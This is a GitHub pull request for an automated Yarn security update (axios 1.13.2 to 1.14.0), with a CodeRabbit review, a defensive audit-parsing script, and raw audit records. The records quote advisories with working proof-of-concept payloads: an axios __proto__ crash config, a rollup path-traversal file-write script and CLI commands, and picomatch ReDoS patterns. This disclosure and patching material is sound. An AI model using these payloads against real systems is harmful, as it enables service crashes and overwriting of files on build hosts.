
chore(deps): Update Yarn dependencies (security-updates) #435

Closed
nielsdrost7 wants to merge 1 commit into develop from automated/yarn-update-25

Conversation

@nielsdrost7 (Collaborator) commented Mar 30, 2026

Yarn Dependency Update

This PR updates Yarn (npm) dependencies.

Update Type: security-updates
Triggered by: schedule

Lock File Status

✓ No lock file conflicts detected.

Updated Packages

╔═══════════════════════════════════════════════════════════════╗
║                    Package Update Report                     ║
╚═══════════════════════════════════════════════════════════════╝

📦 DIRECT DEPENDENCIES (from package.json)
─────────────────────────────────────────────────────────────────

  ✓ axios
    1.13.2 → 1.14.0


🔗 TRANSITIVE DEPENDENCIES (dependencies of dependencies)
─────────────────────────────────────────────────────────────────

  └─ proxy-from-env
     1.1.0 → 2.1.0


═════════════════════════════════════════════════════════════════
SUMMARY: 1 direct, 1 transitive (2 total)
═════════════════════════════════════════════════════════════════

Checks Performed

  • Assets built successfully
  • Dependencies installed and verified
  • Lock file conflicts checked

Security Audit

8 security vulnerabilities detected. Please review audit-report.json.

Review Checklist

  • Review updated packages and their changelogs
  • Verify assets build correctly
  • Check for breaking changes in frontend
  • Test UI changes in development environment
  • Verify no console errors in browser

This PR was automatically created by the Yarn Update workflow.

Summary by CodeRabbit

  • Bug Fixes

    • Resolved security audit findings for axios and build-related dependencies
  • Chores

    • Updated axios development dependency to version 1.14.0
    • Updated transitive dependency versions
    • Refreshed security audit documentation with updated vulnerability records
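The description above points reviewers at audit-report.json, which is the line-delimited JSON that Yarn 1's `yarn audit --json` writes: one `auditAdvisory` record per dependency path, followed by an `auditSummary` record. Two properties of that format matter when reading the "8 security vulnerabilities detected" headline: Yarn repeats the same advisory id once per path that reaches it, and the report only reflects the lockfile it was generated from, so an entry can be stale after a bump. The following is an added example, not code from this PR or from the project: a dependency-free Node script that parses the NDJSON, collapses per-path duplicates, tallies severities and flags advisories whose paths already resolve to a patched version. The sample records copy ids, paths, versions and `patched_versions` from the records in this PR's audit file, trimmed to the fields the checker reads; the `RESOLVED_AFTER_PR` map is an assumption that only axios changed in yarn.lock, and the `auditSummary` line is constructed and ignored by the checker.

```javascript
// Added example; not code from this PR or the project. Checks the line-delimited
// JSON that Yarn 1's `yarn audit --json` writes (the format of audit-report.json):
// parses it, collapses the per-path duplicates Yarn emits for one advisory,
// tallies severities, and flags advisories that are stale because the version the
// lockfile now resolves for that path already satisfies `patched_versions`.
// Only the record shape is taken from real output; the sample below is constructed.

function parseNdjson(text) {
  // One JSON object per line, blank lines skipped; a bad line is reported by number
  // instead of being dropped, so a truncated report cannot pass as a clean one.
  return text.split("\n").flatMap((line, i) => {
    if (line.trim() === "") return [];
    try {
      return [JSON.parse(line)];
    } catch (e) {
      throw new Error(`audit line ${i + 1} is not valid JSON: ${e.message}`);
    }
  });
}

function compareVersions(a, b) {
  // Numeric dotted compare ("1.14.0" > "1.13.5"); audit ranges carry no pre-release tags.
  const pa = a.split(".").map(Number), pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

function satisfies(version, range) {
  // Advisory ranges use plain comparators: space-separated ones are ANDed and
  // "||" separates alternatives, e.g. ">=1.0.0 <=1.13.4" or "<2.3.2".
  return range.split("||").some((alt) =>
    alt.trim().split(/\s+/).every((comparator) => {
      const m = /^(>=|<=|>|<|=)?(\d+(?:\.\d+)*)$/.exec(comparator);
      if (!m) throw new Error(`unsupported comparator: ${comparator}`);
      const c = compareVersions(version, m[2]);
      return { ">=": c >= 0, "<=": c <= 0, ">": c > 0, "<": c < 0, "=": c === 0 }[m[1] || "="];
    })
  );
}

function uniqueAdvisories(records) {
  // Yarn writes one auditAdvisory record per dependency path and reuses the advisory
  // id, so its headline count over-states distinct findings. Group by id, keep paths.
  const byId = new Map();
  for (const r of records) {
    if (r.type !== "auditAdvisory") continue;
    const { resolution, advisory } = r.data;
    const entry = byId.get(advisory.id) || { advisory, paths: [] };
    entry.paths.push(resolution.path);
    byId.set(advisory.id, entry);
  }
  return [...byId.values()];
}

function classify(unique, resolvedByPath) {
  // resolvedByPath maps a Yarn dependency path ("vite>rollup") to the version the
  // lockfile now resolves there. An advisory is stale once every path reaching it
  // resolves to a patched version; otherwise it is still open.
  const result = { stale: [], open: [], tally: {} };
  for (const { advisory, paths } of unique) {
    const unpatched = paths.filter((p) => {
      if (!resolvedByPath[p]) throw new Error(`no resolved version for path ${p}`);
      return !satisfies(resolvedByPath[p], advisory.patched_versions);
    });
    const row = { id: advisory.id, module: advisory.module_name,
                  severity: advisory.severity, paths, patched: advisory.patched_versions };
    result[unpatched.length === 0 ? "stale" : "open"].push(row);
    result.tally[advisory.severity] = (result.tally[advisory.severity] || 0) + 1;
  }
  return result;
}

function auditReport(ndjson, resolvedByPath) {
  const records = parseNdjson(ndjson);
  const headline = records.filter((r) => r.type === "auditAdvisory").length;
  const unique = uniqueAdvisories(records);
  return { headline, distinct: unique.length, ...classify(unique, resolvedByPath) };
}

// Constructed sample: ids, paths, versions and ranges are copied from the records in
// this PR's audit file, reduced to the fields the checker reads.
function advisoryRecord(id, path, module, version, severity, patched) {
  return JSON.stringify({ type: "auditAdvisory", data: {
    resolution: { id, path, dev: false, optional: false, bundled: false },
    advisory: { id, module_name: module, severity, patched_versions: patched,
                findings: [{ version, paths: [path] }] } } });
}
const SAMPLE_AUDIT_NDJSON = [
  advisoryRecord(1113275, "axios", "axios", "1.13.2", "high", ">=1.13.5"),
  advisoryRecord(1113515, "vite>rollup", "rollup", "4.54.0", "high", ">=4.59.0"),
  advisoryRecord(1115551, "vite>picomatch", "picomatch", "4.0.3", "moderate", ">=4.0.4"),
  advisoryRecord(1115551, "vite>tinyglobby>picomatch", "picomatch", "4.0.3", "moderate", ">=4.0.4"),
  advisoryRecord(1115549, "laravel-vite-plugin>vite-plugin-full-reload>picomatch", "picomatch", "2.3.1", "moderate", ">=2.3.2"),
  '{"type":"auditSummary","data":{"vulnerabilities":{"moderate":3,"high":2}}}', // constructed, ignored
  "",
].join("\n");

// Assumption: what yarn.lock resolves after this PR, which bumps only axios.
const RESOLVED_AFTER_PR = {
  "axios": "1.14.0",
  "vite>rollup": "4.54.0",
  "vite>picomatch": "4.0.3",
  "vite>tinyglobby>picomatch": "4.0.3",
  "laravel-vite-plugin>vite-plugin-full-reload>picomatch": "2.3.1",
};

console.log(JSON.stringify(auditReport(SAMPLE_AUDIT_NDJSON, RESOLVED_AFTER_PR), null, 2));
```

On the sample, the headline count is 5 records but only 4 distinct advisories, the axios entry is reported as stale (1.14.0 satisfies >=1.13.5), and the rollup and both picomatch advisories stay open. To run it against a real report, feed the file contents to `parseNdjson` and build the path-to-version map from yarn.lock; a CI gate that fails on `open.length > 0` is more honest than one that fails on the headline number, since it neither double-counts paths nor fails on entries the lockfile has already fixed.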

@coderabbitai (Contributor) coderabbitai bot commented Mar 30, 2026

📝 Walkthrough

This PR updates security audit records to document identified vulnerabilities in dependencies (axios, rollup, picomatch) with their resolution details, bumps the axios devDependency from version 1.13.2 to 1.14.0, and refreshes the package update report to reflect npm packages rather than composer packages.

Changes

Cohort / File(s): Security Audit Records (audit-before.json, audit-report.json)
Summary: Added and structured multiple vulnerability advisories for axios (DoS via __proto__), rollup (arbitrary file write), and picomatch (method injection, ReDoS); appended audit summary with aggregate vulnerability counts (moderate: 3, high: 5) and dependency total (156).

Cohort / File(s): Dependency Updates (package.json, updated-packages.txt)
Summary: Updated axios devDependency from ^1.13.2 to ^1.14.0; refreshed package update report to document direct dependency update (axios) and transitive dependency update (proxy-from-env), replacing prior composer-based report with npm-focused format.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Poem

🐰 Hops through the audits with glee so bright,
Security records now shining in light,
Axios leaps forward to version new,
Dependencies tracked, vulnerabilities true! 🔐

🚥 Pre-merge checks: 3 passed
  • Description Check: Passed. Check skipped - CodeRabbit's high-level summary is enabled.
  • Title check: Passed. The title 'chore(deps): Update Yarn dependencies (security-updates)' directly corresponds to the main changes: updating npm/Yarn dependencies with security fixes, specifically axios and transitive dependencies.
  • Docstring Coverage: Passed. No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.


@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@audit-before.json`:
- Around line 1-9: audit-before.json and audit-report.json contain
line-delimited JSON (NDJSON) but are named/treated as regular JSON causing lint
errors; convert them to proper NDJSON or valid JSON: either rename both files to
.ndjson or .jsonl (audit-before.ndjson, audit-report.ndjson) and update any
references, or wrap the newline-delimited records into a single JSON array;
alternatively add an exclusion for these filenames in the JSON lint/Biome config
so they are not parsed as JSON. Ensure you apply the same change for both
audit-before.json and audit-report.json and update any CI/README references so
tooling continues to find them.

In `@audit-report.json`:
- Around line 1-9: The audit-report.json contains a stale advisory for axios
(CVE-2026-25639 referencing version 1.13.2) even though yarn.lock pins
axios@^1.14.0; regenerate the audit from the current lockfile by re-running the
project audit command (e.g., npm/yarn audit or your audit tooling) using the
current yarn.lock, confirm axios resolves to >=1.13.5 (1.14.0) and that the
CVE-2026-25639 entry is gone, then replace audit-report.json with the
regenerated report and commit the updated audit-report.json and yarn.lock
together to ensure consistency.
ℹ️ Review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: f78f87b8-8240-4ead-9a43-07068fd18bf6

📥 Commits

Reviewing files that changed from the base of the PR and between cc00605 and 3959f88.

⛔ Files ignored due to path filters (1)
  • yarn.lock is excluded by !**/yarn.lock, !**/*.lock
📒 Files selected for processing (4)
  • audit-before.json
  • audit-report.json
  • package.json
  • updated-packages.txt

Comment on lines +1 to +9
{"type":"auditAdvisory","data":{"resolution":{"id":1113275,"path":"axios","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"1.13.2","paths":["axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\n- https://github.com/axios/axios/pull/7369\n- https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\n- https://github.com/axios/axios/releases/tag/v1.13.5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25639\n- https://github.com/axios/axios/pull/7388\n- https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\n- https://github.com/axios/axios/releases/tag/v0.30.3\n- https://github.com/advisories/GHSA-43fc-jf86-j433","created":"2026-02-09T17:46:14.000Z","id":1113275,"npm_advisory_id":null,"overview":"# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. 
The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. 
The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","reported_by":null,"title":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig","metadata":null,"cves":["CVE-2026-25639"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":">=1.0.0 <=1.13.4","github_advisory_id":"GHSA-43fc-jf86-j433","recommendation":"Upgrade to version 1.13.5 or later","patched_versions":">=1.13.5","updated":"2026-02-18T17:16:29.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-754"],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1113515,"path":"vite>rollup","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.54.0","paths":["vite>rollup"]}],"found_by":null,"deleted":null,"references":"- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc","created":"2026-02-25T22:37:26.000Z","id":1113515,"npm_advisory_id":null,"overview":"### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). 
\n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. 
Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup's regex fails to strip dots and slashes, \n // allowing path traversal sequences like '../'\n return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, 'dist');\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the 'dist' folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped 'dist' folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity 
vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.","reported_by":null,"title":"Rollup 4 has Arbitrary File Write via Path Traversal","metadata":null,"cves":["CVE-2026-27606"],"access":"public","severity":"high","module_name":"rollup","vulnerable_versions":">=4.0.0 <4.59.0","github_advisory_id":"GHSA-mw96-cpmx-2vgc","recommendation":"Upgrade to version 4.59.0 or later","patched_versions":">=4.59.0","updated":"2026-02-25T22:37:27.000Z","cvss":{"score":0,"vectorString":null},"cwe":["CWE-22"],"url":"https://github.com/advisories/GHSA-mw96-cpmx-2vgc"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. 
The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. 
The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. 
Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. 
